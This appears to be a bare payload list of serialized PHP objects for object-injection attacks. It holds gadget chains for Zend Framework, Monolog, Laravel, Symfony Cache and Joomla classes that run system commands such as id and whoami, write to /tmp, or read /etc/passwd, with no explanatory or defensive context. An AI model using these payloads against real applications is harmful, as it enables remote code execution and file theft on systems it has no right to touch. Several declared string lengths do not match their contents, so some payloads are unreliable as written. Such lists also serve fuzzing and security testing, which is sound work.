O:8:"Zend_Log":1:{s:11:"\x00*\x00_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"\x00*\x00_eventsToMail";a:1:{i:0;s:1:"*";}s:22:"\x00*\x00_layoutEventsToMail";a:0:{}s:8:"\x00*\x00_mail";O:9:"Zend_Mail":0:{}s:10:"\x00*\x00_layout";O:11:"Zend_Layout":3:{s:13:"\x00*\x00_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"\x00*\x00_matchPattern";s:7:"/(.*)/e";s:15:"\x00*\x00_replacement";s:14:"system('id');";}s:20:"\x00*\x00_inflectorEnabled";b:1;s:10:"\x00*\x00_layout";s:6:"layout";}s:22:"\x00*\x00_subjectPrependText";N;}}}
a:2:{i:0;O:36:"Monolog\Handler\RotatingFileHandler":3:{s:13:"\x00*\x00mustRotate";b:1;s:9:"\x00*\x00level";i:100;s:7:"handler";O:29:"Monolog\Handler\StreamHandler":1:{s:6:"stream";s:16:"/tmp/pwned.txt";}}i:1;s:4:"test";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"\x00*\x00events";O:15:"Faker\Generator":1:{s:13:"\x00*\x00providers";a:1:{i:0;O:32:"Illuminate\Events\Dispatcher":0:{}}}s:8:"\x00*\x00event";s:2:"id";}
O:29:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:24:"\x00*\x00deferred";a:1:{s:3:"cmd";O:33:"Symfony\Component\Cache\CacheItem":2:{s:11:"\x00*\x00innerItem";s:2:"id";s:9:"\x00*\x00poolHash";i:1;}}s:22:"\x00*\x00pool";O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":2:{s:54:"\x00Symfony\Component\Cache\Adapter\ProxyAdapter\x00pool";O:29:"Symfony\Component\Cache\Adapter\ArrayAdapter":0:{}s:60:"\x00Symfony\Component\Cache\Adapter\ProxyAdapter\x00setInnerItem";s:6:"system";}}
O:4:"Evil":1:{s:3:"cmd";s:2:"id";}
O:7:"Archive":1:{s:10:"objectfile";s:11:"/etc/passwd";}
a:1:{s:4:"test";O:21:"JDatabaseDriverMysqli":0:{}}
O:7:"exploit":1:{s:3:"cmd";s:6:"whoami";}
s:30:"TzoxMDoiRXhwbG9pdCI6MTp7czozOiJjbWQiO3M6Mjoid2hvYW1pIjt9";
C:16:"SplObjectStorage":0:{}
